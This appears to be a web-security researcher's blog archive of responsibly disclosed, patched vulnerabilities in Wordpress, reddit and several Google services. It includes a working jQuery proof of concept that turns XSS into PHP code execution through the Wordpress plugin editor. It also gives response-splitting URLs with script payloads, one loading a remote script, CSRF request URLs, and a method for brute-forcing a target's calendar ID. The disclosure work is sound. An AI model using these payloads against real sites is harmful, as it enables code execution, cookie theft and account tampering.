Tag: web application security
2011
01.31

Preface

Last year, I attended my first security conference: QuahogCon. I had never been to a conference before but I had a great time listening to and learning from all the speakers. I especially enjoyed the opening keynote, which was given by Dan Kaminsky. The topic of the talk was “web defense”: the slides can be found here.

The talk covered a lot of ground, but one of the areas Dan touched on briefly was the Referer header. He reminded the audience that the Referer header is difficult to use as a security feature because it isn’t reliably passed to the server (due to filtering by proxies and other client software, browser-specific behaviors that control when referrer information is passed, etc). However, he also made the point that people are often warned to avoid using the header due to security concerns which are no longer valid. To quote the slides:

  • Many Content Management Systems have attempted to use Referer checking to stop XSRF and related attacks
  • We tell them not to do this, for “Security Reasons”

  • Amit et al fixed this years ago

  • There are no known mechanism for causing a browser to emit an arbitrary Referer header, and hasn’t been for quite some time.
    • More importantly, if one is found, it’s fixed, just like a whole host of other browser bugs

Despite its unreliable nature, the Referer header provides information that can not be gotten from other sources; there is no other way for the server to know from what location a request was submitted. As the rest of this post will illustrate, using the Referer header properly can partially mitigate the impact of a cross-site scripting attack: ignoring it can allow an attack to escalate and become much worse.

An Example

[Note: Although I’m sure people will use this post to argue that Wordpress is insecure, it’s worth noting that a similar proof of concept could be built against any web application that does not verify the Referer header as a form of CSRF protection. This kind of attack is in no way Wordpress specific.]

Wordpress makes extensive use of HttpOnly cookies, randomized nonces, and other security measures to protect itself against CSRF and session hijacking attacks. However, it is still possible for an attacker to sidestep all of those protections by making use of XMLHttpRequest, using GETs to retrieve nonces and POSTs to submit requests. Of course, XMLHttpRequest is meant to be able to make same-origin requests: there is nothing inherently wrong with that. Unfortunately, that behavior also poses a security risk: if an attacker can find and exploit an XSS vulnerability on the same domain as a Wordpress installation, that attacker can use XMLHttpRequest to make same-origin requests. That means an XSS vulnerability in any part of the system allows for a CSRF attack against the entire system.

People familiar with Wordpress may also realize that Wordpress administrators are given a wide range of abilities through the backend of their site. Those abilities include editing PHP files on the filesystem, assuming the files are writable by the web server. That won’t be true for all Wordpress installations, but there are many cases in which administrators may (intentionally or unintentionally) allow for such behavior. Although as of last year the file editor functionality can be disabled by defining a constant (DISALLOW_FILE_EDIT), Wordpress does not define this constant by default (see ticket #11306 and changeset 13034).

Now, lets take a moment and summarize the ideas presented here so far:

  1. Given an XSS vulnerability, it’s possible for an attacker to make requests to Wordpress
  2. Administrators can edit files on the web server through a web interface

See where I’m going with this? ;-)

A Demonstration

Here’s a proof of concept that uses jQuery. One GET to grab the correct nonce and other fields from the plugin editor, one POST to append arbitrary code to a PHP file. Voila: an XSS vulnerability has become arbitrary code execution.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

        <title>Wordpress XSS => Arbitrary Code / Command Execution PoC</title>
        <script type="text/javascript" src="http://www.google.com/jsapi"></script>

        <script type="text/javascript">
        var base = "/wordpress-3.0.3/wordpress";
        var code = "<?php /*code goes here */ ?>"

        google.load("jquery", "1.4.4");
        google.setOnLoadCallback(function() {
            $.get(base + '/wp-admin/plugin-editor.php?file=index.php', function (data) {
                var postData = $('#template', data).serialize();

                postData = postData.replace('&amp;action=', encodeURIComponent(code) + '&amp;action=');

                $.post(base + '/wp-admin/plugin-editor.php', postData);
            });
        });
        </script>
    </head>
    <body>
        <p>Hello!</p>
    </body>
</html>

This code (adapted somewhat) could be used in conjunction with any XSS vulnerability in Wordpress or any XSS vulnerability in any other application running on the same domain as a Wordpress installation.

In fact, users with the Editor role in Wordpress have the ability to use unfiltered HTML. They can perform an “XSS attack” against an administrator without any need for an underlying vulnerability. Of course, Wordpress administrators should only be giving editor privileges to people who they feel they can trust. Then again though, what happens if a hacker gains access to an editor’s account?

But how does the Referer help?

The example above relies on the fact that an attacker can use XmlHttpRequest to make valid requests to any page on the targeted server. Verifying the Referer header means that, if an XSS vulnerability exists on a given page, an attacker is limited to submitting requests that a user could normally submit from that page. For instance, if there were an XSS vulnerability in the comments section of a Wordpress site, an attacker would not be able to make POST requests to the plugin editor, or the user manager (to make themselves an administrator), etc. An attacker would be limited to actions like approving a comment, marking a comment as spam, etc.

Of course, I don’t claim that checking the Referer mitigates XSS or CSRF vulnerabilities: at best, it limits the ways in which an XSS vulnerability can be used to cause a more serious security breach. XSS vulnerabilities in sensitive locations like file editors are still just as dangerous. And if you strictly enforce the policy, which you have to do if you want it to be effective, you’ll be locking out users who don’t send a Referer header.

Final Thoughts

I’m far from the first person to notice that an XSS vulnerability can be used to bypass CSRF protections. For instance, Jesse Burns wrote a very thorough paper on CSRF back in 2005 that makes reference to the relationship between XSS and CSRF.

XSS flaws may allow bypassing of any of XSRF protections by leaking valid values of the tokens, allowing referrer’s to appear to be the application itself, or by hosting hostile HTML elements right in the target application.

As I mentioned earlier, Wordpress is not the only web application vulnerable to this kind of attack: any application that fails to validate the Referer header can fall victim to this type of vulnerability escalation. If people have other examples of applications where an XSS vulnerability can have extraordinary consequences, I’d be very interested to hear about them. :)

If you have any opinions, comments, or questions, please post them below!

Update: The comments have raised a couple interesting points.

  1. I’m not the only person to have run across this problem with Wordpress! ;-) In fact, commenter felixaime wrote a post (in French) about the same issue back in October.
  2. It turns out that it may be possible to “forge” the Referer header, to a degree. Commenter lava points out that by loading a page in an IFrame and using JavaScript to manipulate the contents of the page, it may be possible to bypass the kind of Referer checking I described. Definitely worth investigating!
2011
01.14

Summary

Reddit.com was vulnerable to an HTTP Response Splitting vulnerability. As a result, it was possible to execute arbitrary JavaScript and HTML on the reddit.com domain.

What is HTTP Response Splitting?

From Wikipedia:

HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.

The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard (RFC 2616), headers are separated by one CRLF and the response’s headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.

The Web Application Security Consortium also has a good writeup, including sources with more details.

How Did The Vulnerability Work?

Reddit.com, like many sites on the Internet, has a redirect system built into its login functionality. If you’re viewing a page on reddit.com and choose to log in, the system will redirect you back to your original page afterward. The redirect functionality appears to be limited to pages on reddit.com and to reddit.com subdomains.

Under normal circumstances, a login URL with a redirect might look something like this:
http://reddit.com/login?dest=/r/reddit.com

If a user is already logged in, that URL will skip the login step and go straight to the redirection. The headers sent for that redirect look like this:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
HTTP/1.1 302 Moved Temporarily  
Content-Type: text/html; charset=UTF-8  
Location: /r/reddit.com  
Pragma: no-cache  
Cache-Control: no-cache  
Content-Encoding: gzip  
Content-Length: 20  
Server: '; DROP TABLE servertypes; --  
Vary: Accept-Encoding  
Date: Fri, 14 Jan 2011 03:02:59 GMT  
Connection: keep-alive

Unfortunately, the vulnerability occurred because the “dest” parameter of the URL allowed an attacker to include newline characters (\r\n, or %0D%0A). Those characters were then parsed literally, which gave an attacker control over part of the HTTP response being sent by reddit’s servers.

To illustrate the point, lets take a look at one of the proof of concepts I developed to demonstrate the vulnerability.

The malicious URL we’re interested in is http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation:%20javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>. Because of the newline characters being included in the “dest” parameter, the response sent by reddit’s servers would now look something like this

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /r/reddit.com
Location: javascript:

<script>alert(document.cookie)</script>
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Content-Length: 20
Server: '; DROP TABLE servertypes; --
Vary: Accept-Encoding
Date: Fri, 14 Jan 2011 03:02:59 GMT
Connection: keep-alive

Two sets of newlines in a row (%0D%0A%0D%0A) indicate that the HTTP headers are done being sent and the remainder of the response is the response body. Normally, the body of a redirect response is not rendered by the browser: the redirect makes that impossible to do. However, I used the second Location: header to try and confuse the browser, halting the redirect and causing the browser to display the body, which now contained JavaScript that I had included.

Proof of Concepts

I developed a number of proof of concepts, since browser-specific behaviors heavily influenced whether a particular URL could trigger an XSS vulnerability in a particular browser.

  1. http://www.reddit.com/login?dest=http://reddit.com/%0D%0ALocation: javascript:%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in Firefox only. Firefox halts the redirect and displays the body of the response if it encounters a second Location header containing something invalid (like a redirect to a JavaScript URI).
  2. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script>alert(document.cookie)</script>
    This proof of concept worked in both Firefox and Chrome. Both browsers would not redirect and would display the body of the response if the Location header contained a null byte.
  3. http://www.reddit.com/login?dest=http://reddit.com/%00%0D%0A%0D%0A<script src=”http://ha.ckers.org/xss.js”></script>
    This proof of concept worked in Safari only. It is similar to the second proof of concept, but it contains a different JavaScript payload: for some reason, Safari would not execute the JavaScript in the second proof of concept (I didn’t investigate the exact cause too much).

And of course, no XSS writeup would be complete without a picture. So, here’s a screenshot of the first proof of concept in action:

In Firefox 3.6.x, it was possible to trigger JavaScript by injecting a second, invalid Location header and a body containing <script> tags into the response.

In Firefox 3.6.x, it was possible to trigger JavaScript by injecting a second, invalid Location header and a body containing <script> tags into the response.

In case anyone is curious, this vulnerability was patched within 48 hours of my original report.

Anything Else?

I want to thank reddit’s admins for supporting the responsible disclosure of security vulnerabilities. :-)

Also, if you have any questions about HTTP Response Splitting or other web application security vulnerabilities, feel free to leave them in the comments!

2011
01.10

Summary

Feedburner accounts were vulnerable to a CSRF attack against certain services (MyBrand and FeedBulletin). An attacker could cause a user to enable or disable these services (potentially disrupting end-user access to content, in the case of MyBrand).

How Did It Work?

This vulnerability was fairly straightforward. To activate/deactivate MyBrand/FeedBulletin, you sent a simple POST request (to http://feedburner.google.com/fb/a/mybrandSubmit for MyBrand and to http://feedburner.google.com/fb/a/feedbulletinSubmit for FeedBulletin). Neither of those requests required a CSRF token to be processed. Accordingly, an attacker could trick a user into submitting a request without their consent.

Consider a possible attack. The target, Alice, owns a blog located at AliceAppSec.org. Alice provides an RSS feed for her blog (http://feeds.aliceappsec.org/AliceAppSec) using FeedBurner’s MyBrand service. The attacker, Marvin, is a jealous competitor; he wants to disrupt Alice’s RSS feed. To do so, he crafts a page that automatically submits a malicious MyBrand-disabling POST request to FeedBurner. Once that’s done, all he needs to do is convince Alice to look at the page: if she’s signed in to FeedBurner, the POST request will disable MyBrand for her account, causing her feed to return a 404.

Since the vulnerability is now patched, the proof of concept I sent to Google no longer functions. However, I’ve made the code (a simple HTML page) available for anyone who wants to check it out.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills (and for responding to my many emails, even late at night on Sundays). :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.31

Yesterday, I ran across a very interesting XSS vulnerability involving Flash embeds and Wordpress.com. The vulnerable code is now patched (even during the holidays, Automattic’s response time was stellar), so here are all the juicy details. ;-)

In the interest of security, Wordpress.com limits what HTML elements its users are allowed to post on their blogs. Anyone who’s interested can read about those limits on the Wordpress.com site. However, to allow users to embed different types of content (i.e. videos, music, etc), Wordpress.com supports a series of “shortcodes.” These codes are typically created for trusted websites (i.e. YouTube) and allow users to embed content without using HTML directly.

It turns out that VodPod, one of the websites with a Wordpress.com shortcode, provides a way to embed third party content. It does so by generating a URL like http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345 which 301 redirects to your content hosted elsewhere. The Wordpress.com shortcode, when parsed, becomes an embed tag using the VodPod URL. Your browser will happily follow the redirect, allowing any SWF to be displayed within a Wordpress.com blog.

Now, under normal circumstances, that wouldn’t be an issue. These days, just the act of embedding a Flash applet on your page doesn’t cause security issues. However, there was a tiny issue with the HTML that Wordpress.com generated for embeds from VodPod. I’ve reproduced the bad embed code below:

1
2
3
4
5
6
7
<embed
src='http://widgets.vodpod.com/w/video_embed/ExternalVideo.12345'
type='application/x-shockwave-flash'
AllowScriptAccess='always'
pluginspage='http://www.macromedia.com/go/getflashplayer'
wmode='transparent'
flashvars='' width='425' height='350' />

The problem? The embed tag contained AllowScriptAccess='always'. According to Adobe’s documentation, that meant the embedded SWF could execute JavaScript in the context of the page it was being displayed on. Coupled with the ability to embed arbitrary SWFs from third parties, it made an XSS attack against Wordpress.com possible.

So, I shot off an email to Automattic’s security email address with the details: I received a reply very quickly and the vulnerability was patched (by changing the value for AllowScriptAccess to sameDomain) within a few hours. A very happy ending to this holiday tale. :)

2010
12.21

Summary

One page in Google’s Help Center was vulnerable to a reflected cross-site scripting attack.

How did it work?

The page in question contained the following snippet of JavaScript embedded within its HTML:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/*
function fileCartReport(form) {
    var comment = form.elements['body'].value;
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"');
    var client = '0' * 1;
    cartReporter().fileCartReport(entityStr, getAbuseType(), comment, client, function () {
        form.submit();
    });
}
*/

function fileCartReport(form) {
    var entityStrEscaped = 'entity text';
    var entityStr = entityStrEscaped.replace(/&quot;/g, '"')
    var report = {
        entityId: entityStr,
        abuseCategory: getAbuseType(),
        comment: form.elements['body'].value,
        applicationId: '0' * 1,
        language: 'en'
    }
    cartReporter().fileCartReport(report, function () {
        form.submit();
    });
}

In the real code, the string entity text was actually the value of a parameter named entity passed in the URL. In normal links to the page, the entity parameter was a JSON-encoded string, which the rest of the JavaScript would then submit back to Google. However, since the data was being passed in the URL, it was possible to change the value placed in the JavaScript.

Of course, the value wasn’t fully under my control: for instance, there was still some input escaping that turned single quotes and double quotes into HTML entities. As a result, I couldn’t find a way to inject arbitrary JavaScript into the uncommented function. However, I realized that it was possible to inject it into the commented function: all I needed to do was begin my payload with */ and end it with /*, to preserve the existing block comment. At that point, I could write just about any JavaScript I wanted in the middle (keeping in mind the restrictions imposed by input escaping).

The vulnerability in action

I remembered to grab a screenshot of the vulnerability as I was testing for it, and I’ve reproduced it below;

The XSS vulnerability in action (in Google Chrome)

The XSS vulnerability in action (in Google Chrome)

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.17

Over the past several weeks, I’ve been an active participant in Google’s Web Vulnerability Reward Program. I’ve been writing blog posts about each of the vulnerabilities I’ve reported, publishing them once I’m told that the vulnerability has been patched. I’ve also been keeping up with posts that others have written and submitted to places like /r/netsec, /r/xss, and Hacker News. The posts, in aggregate, have explored many areas of web application security: XSS attacks of varying design, CSRF vulnerabilities, HTTP response splitting, clickjacking, etc. However, the program has attracted quite a large number of participants; I’m sure that I’ve seen only a small fraction of what people have posted.

Thus, the idea for this post came into being. My intention is to find and link to reports that people have written about vulnerabilities found as a part of this program. I’ve done a bit of searching and compiled a few links to start with (I’ve ordered them by the date they were posted). If anyone has suggestions for links to add, post in the comments and let me know: I’ll update the post with them.

Title Summary / Notes Posted
Google Calendar CSRF
https://nealpoole.com/blog/
Google Calendar was vulnerable to a series of CSRF vulnerabilities. In at least two separate instances, existing countermeasures (CSRF tokens) were not being validated by the application. 2010-11-30
Google.com XSSHTML Code Injection
http://tinkode27.baywords.com/
Google Maps contained an XSS vulnerability in its “Change default location” feature. The “HTML Code Injection” vulnerability referenced is not a bug: Google Translate has its content properly sandboxed (as the post indicates), mitigating the effects of any vulnerability. 2010-12-01
Google Scholar CSRF
https://nealpoole.com/blog/
Google Scholar was vulnerable to minor but potentially annoying CSRF vulnerabilities in two different pages. The regular search equivalents of both of these pages used CSRF tokens to mitigate these problems. 2010-12-07
Google.com XSS / Google Spreadsheets Clickjacking
http://securitylab.ru/
[English]
Google.com was vulnerable to an XSS attack (the exact details are unclear). It also appears that it was possible to perform a clickjacking attack using a Google Spreadsheet. 2010-12-08
Google XSS Flaw in Website Optimizer Scripts explained
http://www.acunetix.com/blog/web-security-zone/
Google’s Website Optimizer produced “control scripts” that caused websites to become vulnerable to XSS attacks. The attack required that the site already be vulnerable to a cookie injection vulnerability (discussed in more detail in the comments). 2010-12-09
Finding security issues in a website (or: How to get paid by Google)
http://adblockplus.org/blog/
Four different vulnerabilities: one basic XSS in YouTube Help, one XSS in onclick attributes, one HTTP Response Splitting vulnerability, and one last XSS in a tooltips script for Website Optimizer. 2010-12-11
Gmail+Google Chrome XSS Vulnerability
http://spareclockcycles.org/
Gmail contained an XSS vulnerability in the way it handled attachment names in Google Chrome. 2010-12-14
XSS in YouTube
http://www.ebanyu.com.ar/
[English]
YouTube’s inbox allowed an attacker to turn a JSON response into an XSS vector. The attacker needed to know the target’s session token in order to exploit the vulnerability. 2010-12-14
New Google Groups, Non-Persistent XSS
https://nealpoole.com/blog/
The new Google Groups interface contained an XSS vulnerability in its search functionality. The vulnerability required some user interaction to be activated. 2010-12-17
DoubleClick HTTP Header Injection / XSS
http://www.cloudscan.me/
The Doubleclick Ad CDN was vulnerable to HTTP Header Injection and cross site scripting attacks. 2010-12-21
XSS in Google Support Contact Form
https://nealpoole.com/blog/
One page in Google’s Help Center was vulnerable to a reflected cross-site scripting attack. 2010-12-21
Security Token Prediction in Google Scholar Alerts
http://www.garage4hackers.com/
Google Scholar’s Alerts feature used predictable security tokens in its URLs. This weakness allowed an attacker to create / list / delete alerts on behalf of other users. 2011-01-05
XSS in Google Shopping, Maps and Blogs
http://apoup.blogspot.com/
Google Shopping, Google Maps, and Google Blog Search were vulnerable to an unspecified cross-site scripting attack. There are more details available on the reporter’s blog (in the original Japanese and in English). 2011-01-27
XSS Vulnerability in Google Code Static HTML
https://nealpoole.com/blog/
Google Code contained a static HTML page that was vulnerable to a reflected, DOM-based XSS vulnerability. 2011-02-01
XSS in Google Analytics via Event Tracking API
http://spareclockcycles.org/
Google Analytics was vulnerable to a persistent XSS attack. A malicious attacker could generate fake events containing malicious HTML that would be executed on the Analytics dashboard. 2011-02-03
Non-Persistent XSS in Aardvark
https://nealpoole.com/blog/
Aardvark contained several reflected, DOM based XSS vulnerabilities. Due to CSRF protections, exploiting these vulnerabilities remotely was non-trivial. 2011-02-03
Persistent XSS in Google Baraza / Ejabat
https://nealpoole.com/blog/
Google Baraza (www.google.com/baraza/) and Google Ejabat (ejabat.google.com) were vulnerable to a persistent XSS attack. A malicious user could create a post that would trigger JavaScript when an image or link was clicked on. 2011-02-03
Persistent XSS in Blogger Design Preview
https://nealpoole.com/blog/
Blogger’s Design Preview functionality served up author-generated content in the context of blogger.com, allowing an author to perform an XSS attack against a blog administrator. 2011-02-03
Multiple Vulnerabilities in Google Applications
http://d.hatena.ne.jp/masatokinugawa/
[English]
The post covers three different types of vulnerabilities that the author came across. 2011-02-07
Persistent XSS in Google Finance
http://benhayak.blogspot.com/
Google Finance did not properly escape the names of user-created portfolios when using them in JavaScript. As a result, it was possible to craft a name that would cause XSS. 2011-02-16
Persistent XSS in Google Website Optimizer
http://benhayak.blogspot.com/
By using javascript: URIs in place of regular URLs when creating an experiment, the author of the post was able to craft a persistent XSS attack. 2011-02-27
Reflected MHTML Injection in Google Support (mail.google.com)
http://www.wooyun.org/ [English]
It was possible to inject a valid mhtml document into a support page hosted on mail.google.com. As a result, IE users who browsed to a malicious URL using the mhtml protocol handler could have trigger an XSS attack. 2011-03-03
How I Almost Won Pwn2Own via XSS
http://jon.oberheide.org/blog/
The Android Market was vulnerable to an XSS attack due to a lack of output sanitization. Due to how the Android platform works, the vulnerability could have been used to download and execute arbitrary code onto phones. 2011-03-07
Gaining Administrative Privileges on any Blogger.com Account
http://www.nirgoldshlager.com/
Blogger was vulnerable to an HTTP Parameter Pollution vulnerability. By providing the blogID twice in the request (once with a blogID controlled by the attacker and once with a blogID controlled by the victim) it was possible to make requests on behalf of a blog where you were not authorized. 2011-03-10
Reflected XSS in mail.google.com
http://www.cloudscan.me/
Gmail did not properly sanitize input provided by the user in the URL and the cookie. As a result, it was vulnerable to several reflected cross-site scripting attacks. 2011-03-30

Let me know what you think in the comments!

Update (12/21/2010): The comments have spoken and I’ve added a new vulnerability to the list.

Update 2 (12/21/2010): Adding another vulnerability that I reported to the list.

Update 3 (1/6/2011): fb1h2s emailed me about a vulnerability he reported. It has been added to the end of the list.

Update 4 (1/27/2011): We have another vulnerability report submitted via the comments.

Update 5 (2/3/2011): Five new reports have been added to the list, all of them XSS vulnerabilities!

Update 6 (3/4/2011): Three new reports have been added to the list.

Update 7 (3/7/2011): Added a cool new report about an XSS vulnerability in the Android marketplace

Update 8 (3/10/2011): Nir Goldshlager has written in with a link to his first report, an authentication bypass / HTTP Parameter Pollution vulnerability in Blogger.

Update 9 (3/30/2011): New Gmail XSS. Super happy fun time.

2010
12.17

Summary

The new Google Groups interface contained an XSS vulnerability in its search functionality. The vulnerability required some user interaction to be activated.

How Did It Work?

The search box at the top of the new interface is designed to provide some type-ahead functionality: as the user types, his/her input is scanned and used to create a drop down menu of choices. Unfortunately, user input was not properly sanitized; for instance, typing <u> into the search box caused drop down menu items to become underlined. As a result of this oversight, it was possible to type arbitrary HTML/JavaScript into the search box and have it executed by the page.

The new interface's type-ahead functionality, hard at work

The new interface’s type-ahead functionality, hard at work

My next step was to find a way to pass a malicious search string to a user. As it turned out, the interface provided a way to link to search results: visiting https://groups.google.com/forum/?fromgroups#!searchin/googlegroups-announce/<script>alert(document.cookie)<$2Fscript> would put <script>alert(document.cookie)</script> into the user’s search box.

Executing that malicious string required a little user interaction, however. The drop down box (and accordingly, the XSS) would only be activated when the user interacted with the search field. It was possible for a user to avoid the XSS by clicking in the box, highlighting the text, and deleting the entire string (or changing a character in the string so that the script failed to run). However, any other kind of interaction would have triggered the script’s execution.

More Information

The vulnerability mentioned here has been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

Interested readers are encouraged to take a look at other vulnerabilities I’ve reported under Google’s Vulnerability Reward Program.

2010
12.07

Summary

Google Scholar was vulnerable to minor but potentially annoying CSRF vulnerabilities in two different pages. The regular search equivalents of both of these pages used CSRF tokens to mitigate these problems.

Vulnerability #1

There was no CSRF protection used when saving preferences in Google Scholar. So, browsing to the following URL used to set your language on Google Scholars to Arabic and set your search results to return papers written in Chinese: http://scholar.google.com/scholar_setprefs?hl=ar&lang=some&lr=lang_zh-CN&submit. As of right now, the URL no longer updates user preferences (although it does change the language for the current page, and any page accessed from links/forms off of that page).

Vulnerability #2

There was no CSRF check in place for setting up email alerts in Google Scholar. A simple POST to http://scholar.google.com/scholar_alerts?view_op=list_alerts&hl=en where the POST data was

1
2
3
alert_query=[SOME QUERY]&
alert_max_results=10&
create_alert_btn=Create+alert

would have resulted in an alert being created for the currently logged in user (there was a parameter, email_for_op, that was passed in during a real request: removing it seemed to cause the system to default to the currently logged in user’s email address).

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team. I owe them a ton of thanks for organizing this program and giving me a chance to improve my skills. :-)

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
11.30

Summary

Google Calendar was vulnerable to a series of CSRF vulnerabilities. In two separate instances, I found that existing countermeasures (CSRF tokens) were not being validated by the application.

Walkthroughs

Example #1

In the first instance, I found it was possible to add an arbitrary event to a user’s calendar. I used Google Calendar’s “quick add” feature: it allows users to click on a space on the calendar and type in the name of an event, which adds it to the calendar. By monitoring the HTTP traffic between my browser and Google, I determined that the calendar entry was being created by a GET request that looked something like this (I’ve broken up the URL for the sake of readability):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&pprop=HowCreated%3ADRAG
&src=kmVhbF9wb29sLUBicm93bi5lZGU
&ctz=America%2FNew_York
&eid=1288669371381
&sf=true
&action=CREATE
&output=js
&lef=LHZkMjYxNDNmODNlOTBlbnZqMTQ0amh1Ym9AZ3JvdXAuY2FsZW5kYXIuZ29vZ2xlLmNvbQ
&lef=MW4udXNhI2hvbGlkYXlAZ3JvdXVudi5jYWxlbmRhci5nb29nbGUuY29t
&lef=bsVhbF9wb21sZUBicm92bi5lZHU
&droi=20101024T000000%2F20101212T000000
&secid=-_1FyItA6aDLfYZl6GhuK62s74o

The first thing I tried doing was removing the secid parameter (which I assumed to be a CSRF token): surprisingly, while the output of the response changed slightly, it still created a new event on the calendar. I then experimented through trial and error with removing more parameters until I got the URL down to the following:

1
2
3
4
5
http://www.google.com/calendar/event?
dates=20101103T003000%2F20101103T013000
&text=asfsaf
&sf=true
&action=CREATE

An attacker could have provided that URL to a target in any number of ways: just visiting it would have added a corresponding entry to the target’s calendar.

Example #2

The second instance involved changing the privacy settings of an existing calendar. To do so, an attacker first needed to determine the calendar’s unique identifier. I proposed the following method for finding such an identifier, assuming the target is a Gmail user (and we’re interested in their default, personal calendar):

  1. Identify the target. Lets say the target is example@gmail.com.
  2. Register a Gmail account where the first letter of the account is different from the target’s. So, here, I might register fxample@gmail.com
  3. Sign in to Google Calendar as the attacker, take a look at the printable image version of your calendar. It will have the attacker’s email address in the upper left hand corner. The URL for the image looks something like this (I’ve omitted unnecessary parameters): https://www.google.com/calendar/printable?src=[SOME STR]&psdec=true&pft=png
  4. Through trial and error, try different permutations of letters/numbers in the first few characters of the src parameter. You can see how your changes affect the decoded string by looking in the upper left of the image: it will display a new email address based on your changes (sometimes it might tell you that the src is invalid, in which case you just continue trying). There’s a small enough number of possibilities that it can be brute-forced.
  5. Eventually, you figure out what the right src value is for the target: the email on top will match the target’s email address.

From there, the rest was simple. Privacy settings are controlled by sending a POST request to https://www.google.com/calendar/editcaldetails. A CSRF token was included if the request was made via the web interface, but omitting the token did not prevent the request from functioning. The POST body consisted of just the following:

1
2
3
dtid=[VALID-SRC]
&ap=X19wdWJsaWNfcHJpbmNpcGFsX19dcHVibGljxmNhbGVuZGFyLmdvb2dsZS5jb20
&ap=20

where [VALID-SRC] was the valid src found in step 5 and the rest was a constant derived from the HTML for the corresponding form in the web interface.

More Information

The vulnerabilities mentioned here have all been confirmed patched by the Google Security Team.

To see more posts I’ve written about vulnerabilities reported under Google’s Vulnerability Reward Program, please click here.

2010
11.30

When a friend of mine told me about Google’s new vulnerability reward program for web applications, my first reaction was a mix of excitement and skepticism. On the one hand, I love web application security and penetration testing: this program was right up my alley (especially given my recent abundance of free time). On the other hand, I had never run across a security vulnerability in a Google application before: I wasn’t sure that I would find anything, even if I looked hard.

As it turned out, I needn’t have worried: I spent many hours testing various Google webapps, but I also found plenty of vulnerabilities. ;-)

Under the terms of the program (and the rules of responsible disclosure), I will not be discussing the details of any vulnerabilities until they are fully resolved. Once the Google Security Team has confirmed to me that a particular issue has been dealt with, I will be doing a little writeup about it on this blog (a full list of the writeups can be found here). Hopefully people will find the writeups informative. :-)